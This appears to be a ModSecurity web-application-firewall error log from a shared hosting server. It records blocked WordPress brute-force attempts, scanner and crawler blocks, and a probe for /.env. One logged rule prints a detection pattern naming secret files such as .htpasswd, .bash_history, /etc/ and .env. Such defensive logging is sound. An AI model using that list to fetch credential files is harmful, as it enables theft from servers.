[Tue May 26 14:07:20.131835 2026] [security2:error] [pid 585807:tid 585983] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbv-Hp6I37JgAKrHUDMQAAALI"]
[Tue May 26 14:07:22.391882 2026] [security2:error] [pid 585807:tid 585940] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbweHp6I37JgAKrHUDeQAAAIg"]
[Tue May 26 14:07:23.910177 2026] [security2:error] [pid 585807:tid 586048] [client 202.141.30.10:65347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbw-Hp6I37JgAKrHUDrAAAAPI"]
[Tue May 26 14:07:23.910311 2026] [security2:error] [pid 585807:tid 586048] [client 202.141.30.10:65347] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbw-Hp6I37JgAKrHUDrAAAAPI"]
[Tue May 26 14:07:24.250575 2026] [security2:error] [pid 585807:tid 586030] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbw-Hp6I37JgAKrHUDsgAAAOE"]
[Tue May 26 14:07:24.567299 2026] [security2:error] [pid 585807:tid 585967] [client 47.128.98.235:15812] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/robots.txt"] [unique_id "ahVbxOHp6I37JgAKrHUDwgAAAKI"]
[Tue May 26 14:07:25.658385 2026] [security2:error] [pid 585807:tid 585810] [remote 62.93.179.166:50788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "canopykaapi.com"] [uri "/.env"] [unique_id "ahVbxeHp6I37JgAKrHUD5wAAlwI"]
[Tue May 26 14:07:26.263712 2026] [security2:error] [pid 585807:tid 586006] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbxeHp6I37JgAKrHUD7QAAAMk"]
[Tue May 26 14:07:28.612940 2026] [security2:error] [pid 585807:tid 585911] [remote 95.70.131.179:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVbyOHp6I37JgAKrHUENgAA9Gc"]
[Tue May 26 14:07:28.613240 2026] [security2:error] [pid 585807:tid 586050] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVbyOHp6I37JgAKrHUENgAA9Gc"]
[Tue May 26 14:07:28.724776 2026] [security2:error] [pid 585807:tid 586037] [client 14.245.131.163:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbyOHp6I37JgAKrHUEMQAAAOg"]
[Tue May 26 14:07:29.318026 2026] [security2:error] [pid 585807:tid 585909] [remote 193.42.61.12:56758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVbyeHp6I37JgAKrHUETAAAtWU"]
[Tue May 26 14:07:30.223794 2026] [security2:error] [pid 585807:tid 585815] [remote 103.230.156.120:47514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVbyeHp6I37JgAKrHUEVwAA5Qc"]
[Tue May 26 14:07:30.440357 2026] [security2:error] [pid 585807:tid 585997] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbyuHp6I37JgAKrHUEZAAAAMA"]
[Tue May 26 14:07:30.688051 2026] [security2:error] [pid 585807:tid 586043] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbyuHp6I37JgAKrHUEaQAAAO0"]
[Tue May 26 14:07:32.597898 2026] [security2:error] [pid 585807:tid 585952] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbzOHp6I37JgAKrHUEpQAAAJQ"]
[Tue May 26 14:07:34.658923 2026] [security2:error] [pid 585807:tid 585967] [client 202.141.30.10:65406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbzuHp6I37JgAKrHUE0gAAAKI"]
[Tue May 26 14:07:34.659051 2026] [security2:error] [pid 585807:tid 585967] [client 202.141.30.10:65406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbzuHp6I37JgAKrHUE0gAAAKI"]
[Tue May 26 14:07:35.064558 2026] [security2:error] [pid 585807:tid 585980] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbzuHp6I37JgAKrHUE0QAAAK8"]
[Tue May 26 14:07:35.322086 2026] [security2:error] [pid 585807:tid 586034] [client 128.140.41.193:56546] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVbz-Hp6I37JgAKrHUE5gAAAOU"], referer: https://thegoodsporting.com
[Tue May 26 14:07:37.046591 2026] [security2:error] [pid 585807:tid 585979] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb0OHp6I37JgAKrHUFCAAAAK4"]
[Tue May 26 14:07:39.432891 2026] [security2:error] [pid 585807:tid 585998] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb0uHp6I37JgAKrHUFTQAAAME"]
[Tue May 26 14:07:41.353001 2026] [security2:error] [pid 585807:tid 585953] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb1OHp6I37JgAKrHUFgQAAAJU"]
[Tue May 26 14:07:43.042063 2026] [security2:error] [pid 585807:tid 586063] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb1uHp6I37JgAKrHUFrAAAAQE"]
[Tue May 26 14:07:44.238505 2026] [security2:error] [pid 585807:tid 585969] [client 95.70.131.179:63883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVb2OHp6I37JgAKrHUF1wAAAKQ"]
[Tue May 26 14:07:44.238668 2026] [security2:error] [pid 585807:tid 585969] [client 95.70.131.179:63883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVb2OHp6I37JgAKrHUF1wAAAKQ"]
[Tue May 26 14:07:45.465082 2026] [security2:error] [pid 585807:tid 585939] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb2eHp6I37JgAKrHUF6QAAAIc"]
[Tue May 26 14:07:45.731743 2026] [security2:error] [pid 585807:tid 586011] [client 202.141.30.10:35449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb2eHp6I37JgAKrHUF-gAAAM4"]
[Tue May 26 14:07:45.731860 2026] [security2:error] [pid 585807:tid 586011] [client 202.141.30.10:35449] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb2eHp6I37JgAKrHUF-gAAAM4"]
[Tue May 26 14:07:46.041635 2026] [security2:error] [pid 585807:tid 585892] [remote 14.161.17.36:49392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVb2eHp6I37JgAKrHUF_gAAt1Q"]
[Tue May 26 14:07:47.174963 2026] [security2:error] [pid 585807:tid 585983] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb2uHp6I37JgAKrHUGFAAAALI"]
[Tue May 26 14:07:48.337408 2026] [security2:error] [pid 585807:tid 586008] [client 45.134.140.24:57356] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb3OHp6I37JgAKrHUGOQAAAMs"]
[Tue May 26 14:07:48.420134 2026] [security2:error] [pid 585807:tid 586008] [client 45.134.140.24:57356] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb3OHp6I37JgAKrHUGOQAAAMs"]
[Tue May 26 14:07:49.342784 2026] [security2:error] [pid 585807:tid 586037] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb3OHp6I37JgAKrHUGSAAAAOg"]
[Tue May 26 14:07:49.733487 2026] [security2:error] [pid 585807:tid 586024] [client 45.134.140.24:57372] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb3eHp6I37JgAKrHUGWAAAANs"]
[Tue May 26 14:07:49.814669 2026] [security2:error] [pid 585807:tid 586024] [client 45.134.140.24:57372] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb3eHp6I37JgAKrHUGWAAAANs"]
[Tue May 26 14:07:49.982271 2026] [security2:error] [pid 585807:tid 585874] [remote 103.11.102.22:34584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVb3eHp6I37JgAKrHUGWwAAtkI"]
[Tue May 26 14:07:50.915851 2026] [security2:error] [pid 585807:tid 586040] [client 85.208.96.198:49758] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVb3uHp6I37JgAKrHUGcAAAAOo"]
[Tue May 26 14:07:50.915976 2026] [security2:error] [pid 585807:tid 586040] [client 85.208.96.198:49758] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVb3uHp6I37JgAKrHUGcAAAAOo"]
[Tue May 26 14:07:50.987335 2026] [security2:error] [pid 585807:tid 586017] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahVb3eHp6I37JgAKrHUGVAAAANQ"]
[Tue May 26 14:07:51.059953 2026] [security2:error] [pid 585807:tid 585985] [client 45.134.140.24:57386] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb3-Hp6I37JgAKrHUGeAAAALQ"]
[Tue May 26 14:07:51.141109 2026] [security2:error] [pid 585807:tid 585985] [client 45.134.140.24:57386] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb3-Hp6I37JgAKrHUGeAAAALQ"]
[Tue May 26 14:07:51.512517 2026] [security2:error] [pid 585807:tid 585944] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb3-Hp6I37JgAKrHUGdwAAAIw"]
[Tue May 26 14:07:51.935486 2026] [security2:error] [pid 585807:tid 585962] [client 14.226.100.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb3-Hp6I37JgAKrHUGkgAAAJ0"]
[Tue May 26 14:07:52.571108 2026] [security2:error] [pid 585807:tid 585994] [client 45.134.140.24:57392] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb4OHp6I37JgAKrHUGsAAAAL0"]
[Tue May 26 14:07:52.649342 2026] [security2:error] [pid 585807:tid 585994] [client 45.134.140.24:57392] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb4OHp6I37JgAKrHUGsAAAAL0"]
[Tue May 26 14:07:53.294715 2026] [security2:error] [pid 585807:tid 586035] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb4OHp6I37JgAKrHUG3QAAAOY"]
[Tue May 26 14:07:54.138236 2026] [security2:error] [pid 585807:tid 585969] [client 45.134.140.24:57398] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb4uHp6I37JgAKrHUHAAAAAKQ"]
[Tue May 26 14:07:54.214495 2026] [security2:error] [pid 585807:tid 585969] [client 45.134.140.24:57398] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb4uHp6I37JgAKrHUHAAAAAKQ"]
[Tue May 26 14:07:54.591702 2026] [security2:error] [pid 585807:tid 586045] [client 114.119.133.87:54083] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "amslca.com"] [uri "/robots.txt"] [unique_id "ahVb4uHp6I37JgAKrHUHDAAAAO8"]
[Tue May 26 14:07:54.753514 2026] [security2:error] [pid 585807:tid 585986] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb4uHp6I37JgAKrHUHCAAAALU"]
[Tue May 26 14:07:54.783460 2026] [security2:error] [pid 585807:tid 585815] [remote 74.7.241.58:45598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVb4uHp6I37JgAKrHUHEwAA1wc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:07:55.674942 2026] [security2:error] [pid 585807:tid 585965] [client 45.134.140.24:57408] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb4-Hp6I37JgAKrHUHNQAAAKA"]
[Tue May 26 14:07:55.767034 2026] [security2:error] [pid 585807:tid 585965] [client 45.134.140.24:57408] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVb4-Hp6I37JgAKrHUHNQAAAKA"]
[Tue May 26 14:07:56.641314 2026] [security2:error] [pid 585807:tid 586033] [client 202.141.30.10:35496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb5OHp6I37JgAKrHUHVQAAAOQ"]
[Tue May 26 14:07:56.641482 2026] [security2:error] [pid 585807:tid 586033] [client 202.141.30.10:35496] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb5OHp6I37JgAKrHUHVQAAAOQ"]
[Tue May 26 14:07:57.473678 2026] [security2:error] [pid 585807:tid 585946] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb5eHp6I37JgAKrHUHXgAAAI4"]
[Tue May 26 14:07:59.495232 2026] [security2:error] [pid 585807:tid 586061] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb5-Hp6I37JgAKrHUHlQAAAP8"]
[Tue May 26 14:08:00.708743 2026] [security2:error] [pid 585807:tid 585969] [client 74.7.228.3:49914] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "eurodomini.com"] [uri "/robots.txt"] [unique_id "ahVb6OHp6I37JgAKrHUHzQAApBw"]
[Tue May 26 14:08:00.787836 2026] [security2:error] [pid 585807:tid 585982] [client 74.7.228.3:49914] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "eurodomini.com"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahVb6OHp6I37JgAKrHUHzgAAsR4"], referer: https://eurodomini.com/robots.txt
[Tue May 26 14:08:00.863667 2026] [security2:error] [pid 585807:tid 585941] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb6OHp6I37JgAKrHUHugAAAIk"]
[Tue May 26 14:08:02.065150 2026] [security2:error] [pid 585807:tid 585964] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVb6eHp6I37JgAKrHUH7QAAAJ8"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1261213&moderation-hash=c3216d971620d5dae8b0519854a3d0bc
